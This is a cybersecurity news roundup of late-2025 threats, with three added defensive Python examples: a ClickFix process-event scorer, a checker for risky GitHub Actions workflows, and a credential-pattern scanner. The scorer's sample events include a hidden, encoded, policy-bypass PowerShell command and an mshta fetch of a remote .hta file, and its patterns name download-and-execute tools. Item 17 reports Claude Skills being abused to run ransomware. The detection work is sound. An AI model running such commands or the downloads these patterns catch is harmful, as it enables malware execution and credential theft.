This Week in Cybersecurity: 20 Threats You Should Know About
The cybersecurity landscape continues to evolve rapidly, with November–December 2025 revealing several high-impact exploits, sophisticated malware strains, global phishing campaigns, and new regulatory guidance. Here’s a comprehensive look at the biggest stories shaking the security world.
1. Critical Yearn Finance yETH Exploit Drains $9M
A severe vulnerability in Yearn Finance’s yETH pool has led to one of DeFi’s most capital-efficient attacks ever recorded.
Researchers say attackers abused a flaw in the protocol’s internal accounting system, exploiting an uncleared gas-saving cache.
🔑 Key Facts
- $9 million stolen
- Attacker deposited only 16 wei ($0.000000000000000045)
- Minted 235 septillion yETH tokens
- Caused by a broken cache reset in the pool
- Called “one of the most capital-efficient DeFi exploits ever” (Check Point)
2. Linux Malware Evolves: New BPFDoor & Symbiote Variants
Fortinet has identified 151 new BPFDoor samples and three Symbiote variants leveraging eBPF for stealth.
⚙️ What's New:
- IPv6 support
- UDP port-hopping for covert C2
- Dynamic protocol handling
- Expanded non-standard ports
Security analysts warn threat actors are using eBPF to evade traditional detection more effectively than ever.
3. Microsoft Blocks Massive Storm-0900 Phishing Campaign
Microsoft intercepted a phishing blitz of tens of thousands of emails using fake:
- Parking tickets
- Medical test results
- Thanksgiving-themed lures
Victims were funneled through:
- A slider CAPTCHA
- A ClickFix PowerShell trick
- Deployment of XWorm malware
Storm-0900 is known for launching phishing waves every week when active.
4. Fake Grant Email Campaign Delivers Stealerium
Trustwave has uncovered a phishing campaign offering victims fake professional achievement grants.
Attack Chain:
- Password-protected ZIP
- HTML page phishing for webmail credentials
- SVG-based ClickFix PowerShell loader
- Installs the Stealerium infostealer
The emails include personalized details, increasing credibility.
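Items 3 and 4 above both end in a ClickFix step, where the victim is talked into pasting a command into the Run box or a shell. From the defender's side the observable artifact is a script interpreter spawned by an interactive shell with hidden-window, encoded-command or execution-policy flags. The following scorer is an added example, not code from the original article or from Microsoft or Trustwave; the process-creation events it scans are constructed inline, and the field layout (parent image, image, command line) is an assumption modelled loosely on Sysmon Event ID 1.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent: str   # image path of the parent process
    image: str    # image path of the newly created process
    cmdline: str  # full command line of the new process


# Constructed sample events (not from the page). The first two have the
# ClickFix shape: an interpreter launched by explorer.exe with obfuscation
# flags. The base64 blob is a placeholder, not a real encoded command.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -nop -ep bypass -enc "
                 "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\mshta.exe",
                 "mshta https://example.invalid/verify.hta"),
    ProcessEvent(r"C:\Program Files\Microsoft VS Code\Code.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd /c npm test"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -File C:\\ProgramData\\patch.ps1"),
]

# explorer.exe is the parent for commands pasted into the Run box or the
# File Explorer address bar, which is how ClickFix lures get executed.
INTERACTIVE_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Each pattern is one independent indicator; the score is their count.
SUSPICIOUS_FLAGS = [
    re.compile(r"(?i)(^|\s)-(w|windowstyle)\s+hidden"),
    re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}"),
    re.compile(r"(?i)(^|\s)-(ep|executionpolicy)\s+bypass"),
    re.compile(r"(?i)\b(iex|invoke-expression|downloadstring|"
               r"invoke-webrequest|iwr|curl)\b"),
    re.compile(r"(?i)^mshta\s+https?://"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    if (basename(ev.parent) in INTERACTIVE_PARENTS
            and basename(ev.image) in INTERPRETERS):
        reasons.append("interpreter spawned from an interactive shell "
                       "(explorer.exe)")
    for pat in SUSPICIOUS_FLAGS:
        m = pat.search(ev.cmdline)
        if m:
            reasons.append(f"suspicious argument: {m.group(0).strip()}")
    return len(reasons), reasons


def flag_clickfix(events: list[ProcessEvent], threshold: int = 2) -> list[int]:
    """Indices of events whose indicator count reaches the threshold."""
    return [i for i, ev in enumerate(events) if score_event(ev)[0] >= threshold]


if __name__ == "__main__":
    for i in flag_clickfix(SAMPLE_EVENTS):
        score, reasons = score_event(SAMPLE_EVENTS[i])
        print(f"event {i}: score {score}")
        for r in reasons:
            print("  -", r)
```

The threshold of two indicators keeps a lone `cmd.exe` from Explorer or a scheduled `-File` run from paging anyone; a hidden-window encoded command from Explorer scores on every indicator and should be escalated together with the preceding browser activity.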
5. Russian Threat Group COLDRIVER Targets Reporters Without Borders
French NGO RSF (Reporters Without Borders) was targeted by spear-phishing tied to Russia’s COLDRIVER group.
Attack Details:
- Malicious ProtonMail emails
- Calisto-style decoy PDFs
- Multi-layer redirect via compromised sites
- AiTM (Adversary-in-the-Middle) phishing pages capturing Proton credentials
Proton has since removed the attacker-controlled accounts.
6. Android Expands Scam Protection to Cash App & JPMorgan
Google is rolling out enhanced in-call scam protections in the U.S. for Android users, now supporting:
- Cash App
- JPMorganChase
Key Feature:
If users screen-share or call unknown numbers while using financial apps, Android shows:
- A warning
- A 30-second delay
- An option to stop the call or screen share
This helps break the psychological momentum scammers rely on.
7. TangleCrypt Packer Used in Qilin Ransomware Attack
WithSecure has analyzed TangleCrypt, a new malware packer used to deploy:
- STONESTOP EDR killer
- ABYSSWORKER vulnerable driver (BYOVD)
Although its design is advanced, flaws in the implementation may cause payload crashes, providing defenders with detection opportunities.
8. Let’s Encrypt to Reduce Certificate Validity to 45 Days
Let’s Encrypt is preparing to shorten SSL certificate lifetimes from:
- 90 days → 45 days
- Domain authorization reuse: 30 days → 7 hours
Rollout will complete by 2028, aligning with CA/Browser Forum requirements.
9. Malicious VS Code Extension Drops OctoRAT
A fake VS Code extension, prettier-vscode-plus, mimicked the real Prettier tool to spread malware.
Multi-Stage Chain:
- VBS dropper
- PowerShell loader
- Anivia loader
- OctoRAT with 70+ remote commands
Attackers used VS Code Marketplace to reach developers directly.
10. 7 Nations Publish OT AI Security Guidance
Cyber agencies from the U.S., U.K., Germany, Canada, Australia, and others released joint guidance for using AI safely in Operational Technology environments.
Key principles include:
- Training staff on AI risks
- Governance and compliance
- Safety-first risk models
- Oversight for industrial & critical infrastructure systems
This marks a rare global alignment on OT security.
11. India Reports GPS Spoofing at Major Airports
Eight major Indian airports, including Delhi, Mumbai, and Bangalore, detected:
- GPS spoofing
- GPS jamming
No accidents occurred, but the government is rolling out advanced cybersecurity measures across the Aviation Authority of India.
12. Shai-Hulud 2.0 Worm Exposes 400,000 Secrets
A massive npm supply-chain attack:
- Compromised 800+ packages
- Leaked 400,000 secrets
- Published stolen data in 30,000 GitHub repos
Main infection vectors:
- @postman/tunnel-agent 0.6.7
- @asyncapi/specs 6.8.3
Attackers exploited GitHub CI/CD misconfigurations via pull_request_target.
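The `pull_request_target` misconfiguration mentioned above is worth seeing concretely: that trigger runs in the base repository's context with access to its secrets, so a workflow that also checks out and executes the pull request's head commit hands those secrets to anyone who can open a PR. The checker below is an added example (not the article's or any project's code) that flags this shape with regex heuristics rather than a full YAML parser; both sample workflows are constructed for illustration.

```python
import re

# Constructed sample: a privileged trigger combined with checking out and
# running untrusted PR code while secrets are in scope.
RISKY_WORKFLOW = """\
name: ci
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci && npm test
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

# Constructed sample of the hardened shape: plain pull_request (no secrets
# for forks, read-only token) and a least-privilege permissions block.
SAFE_WORKFLOW = """\
name: ci
on:
  pull_request:
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""

# Heuristics: a real linter would parse the YAML and walk the steps.
PRIVILEGED_TRIGGER = re.compile(r"\bpull_request_target\b")
UNTRUSTED_REF = re.compile(
    r"github\.event\.pull_request\.head\.(sha|ref)|github\.head_ref")
SECRET_USE = re.compile(r"\$\{\{\s*secrets\.")
TOP_LEVEL_PERMISSIONS = re.compile(r"^permissions\s*:", re.M)


def workflow_findings(text: str) -> list[str]:
    """Return human-readable findings for one workflow file's text."""
    findings = []
    if not PRIVILEGED_TRIGGER.search(text):
        return findings  # nothing privileged to worry about
    if UNTRUSTED_REF.search(text):
        findings.append("pull_request_target checks out the PR head: fork code "
                        "runs with the base repository's secrets and token")
    if SECRET_USE.search(text):
        findings.append("secrets are referenced in a pull_request_target job")
    if not TOP_LEVEL_PERMISSIONS.search(text):
        findings.append("no top-level permissions block: GITHUB_TOKEN keeps "
                        "the repository default")
    return findings


if __name__ == "__main__":
    for name, text in (("risky", RISKY_WORKFLOW), ("safe", SAFE_WORKFLOW)):
        print(name, workflow_findings(text) or "no findings")
```

If a workflow genuinely needs `pull_request_target` (for example to label PRs), keep it from checking out or executing anything from the PR head, and split the untrusted build into a separate `pull_request` workflow whose results are consumed later.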
13. Hacker Jailed for "Evil Twin" Wi-Fi Attacks
An Australian man received 7+ years in prison for:
- Running fake airport Wi-Fi networks
- Phishing personal accounts
- Stealing intimate photos
- Hacking his employer
He used a Wi-Fi Pineapple to create rogue SSIDs mimicking trusted networks.
14. South Korea Busts Massive IP Camera Snooping Operation
Authorities arrested individuals who hacked 120,000 IP cameras, creating and selling:
- Sexual exploitation videos
- Footage from clinics and private homes
- Content fed to a foreign adult site ("Site C")
Three buyers have also been arrested.
15. Public GitLab Repos Leak 17,000 Live Secrets
TruffleHog scanned 5.6 million GitLab repos and found:
- 17,430 verified secrets
- Top leaked credentials:
  - GCP
  - MongoDB
  - Telegram bot tokens
  - OpenAI API keys
  - AWS keys
One valid secret dated back to 2009.
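The credential types listed above have recognisable shapes, which is what makes scanning at scale feasible. The scanner below is an added example, not TruffleHog's code or anything from the article: it matches a handful of documented formats (the AWS access-key-ID prefix, the Telegram `bot_id:token` layout) plus looser heuristics for OpenAI keys and MongoDB URIs that embed a password, and redacts matches in its output. It does not do the second step TruffleHog performs, verifying each candidate against the provider. The sample files are constructed, and the AWS key is the example ID from AWS documentation.

```python
import re
from dataclasses import dataclass

# Detector patterns. AWS access-key IDs and Telegram bot tokens have documented
# formats; the OpenAI and MongoDB patterns are heuristics (assumption).
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b"),
    "telegram_bot_token": re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{35}\b"),
    "openai_api_key": re.compile(r"\bsk-[A-Za-z0-9_-]{20,}\b"),
    # only URIs that carry a password (user:pass@host) are interesting
    "mongodb_uri_with_password": re.compile(
        r"mongodb(\+srv)?://[^:\s/]+:[^@\s]+@[^\s'\"]+"),
}

# Constructed sample repository contents (not real credentials).
SAMPLE_FILES = {
    "config/settings.py": (
        "AWS_ACCESS_KEY_ID = 'AKIAIOSFODNN7EXAMPLE'\n"
        "MONGO_URI = 'mongodb+srv://app:Sup3rSecret@cluster0.example.invalid/db'\n"
        "MONGO_DEV = 'mongodb://localhost:27017/dev'\n"
    ),
    "bot/.env": (
        "TELEGRAM_TOKEN=123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi\n"
        "OPENAI_API_KEY=sk-constructedplaceholder0000000000\n"
    ),
    "README.md": "Run `npm test` before opening a PR.\n",
}


@dataclass
class Finding:
    path: str
    line: int
    kind: str
    preview: str  # redacted, never the full secret


def redact(secret: str) -> str:
    """Keep a short prefix so the finding can be located, drop the rest."""
    return f"{secret[:4]}...({len(secret)} chars)"


def scan_text(path: str, text: str) -> list[Finding]:
    """Scan one file's text line by line and return redacted findings."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pat in PATTERNS.items():
            for m in pat.finditer(line):
                findings.append(Finding(path, lineno, kind, redact(m.group(0))))
    return findings


def scan_files(files: dict[str, str]) -> list[Finding]:
    """Scan a mapping of path -> contents, as a repository walk would yield."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path}:{f.line}: {f.kind} {f.preview}")
```

Redacting in the scanner itself matters: a report that quotes the full credential just creates another copy of the leak, which is the same problem the 30,000 Shai-Hulud dump repositories illustrate.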
16. Fake Zendesk Domains Target Help-Desk Teams
The group Scattered LAPSUS$ Hunters is using over 40 phishing domains impersonating Zendesk.
Attacks include:
- Fake SSO login pages
- Fraudulent support tickets
- Delivery of RATs and credential-stealing malware
Analysts warn that copycat groups may also be involved.
17. Claude Skills Abused to Execute Ransomware
Cato Networks showed how an attacker could weaponize Claude Skills to run MedusaLocker ransomware.
Risks:
- Skills gain long-term permissions
- Hidden code can run without re-approval
- Skills can download, execute, and exfiltrate files
Anthropic says this behavior is expected and users receive warnings.
18. Steganographic Loader Drops LokiBot
A .NET loader hides malware inside seemingly legit documents using:
- Steganography
- Memory-only loading
Payloads include:
- Quasar RAT
- LokiBot credential stealer
Targets Windows and Android cryptocurrency wallets and browser credentials.
19. Nimbus Manticore Malware Expands Capabilities
A new Iranian-linked malware strain analyzed by Deep Instinct shows:
- Dynamic module loading
- Anti-analysis features
- Lateral movement
- Privilege escalation
The malware seeks to spread across entire networks, not just single endpoints.
20. Threat Actors Abuse Teams Guest Access
Attackers impersonated IT staff via Microsoft Teams’ Chat with Anyone feature.
Attack chain:
- Fake IT help message
- Phishing link
- Quick Assist installation
- Credential theft & data exfiltration
- A Python-compiled infostealer dropped afterward
Guest access invites were key to initial entry.
21. Matanbuchus 3.0 Adds Protobufs & Obfuscation
The latest version of the Matanbuchus downloader includes:
- Protocol Buffers communication
- Junk code
- Encrypted strings
- API hashing
- Expiration dates
- Scheduled task persistence
It’s being used to drop Rhadamanthys and NetSupport RAT payloads.